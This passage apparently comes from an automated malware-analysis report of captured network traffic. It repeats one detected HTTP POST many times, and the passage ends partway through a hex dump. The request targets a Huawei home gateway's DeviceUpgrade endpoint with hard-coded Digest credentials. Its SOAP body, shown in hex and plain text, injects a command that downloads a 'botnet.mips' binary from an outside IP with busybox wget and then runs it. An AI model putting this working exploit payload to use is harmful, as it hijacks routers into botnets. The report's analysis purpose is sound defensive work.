73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 20 2f 62 6f 74 6e 65 74 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 3b 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 199.195.250.211 -l /tmp/.hiroshima -r /botnet.mips; /bin/busybox chmod 777 * /tmp/.hiroshima; /tmp/.hiroshima huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
      Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 39 39 2e 31 39 35 2e 32 35 30 2e 32 31 31 20 2d 6c 20 2f 74 6d 70 2f 2e 68 69 72 6f 73 68 69 6d 61 20 2d 72 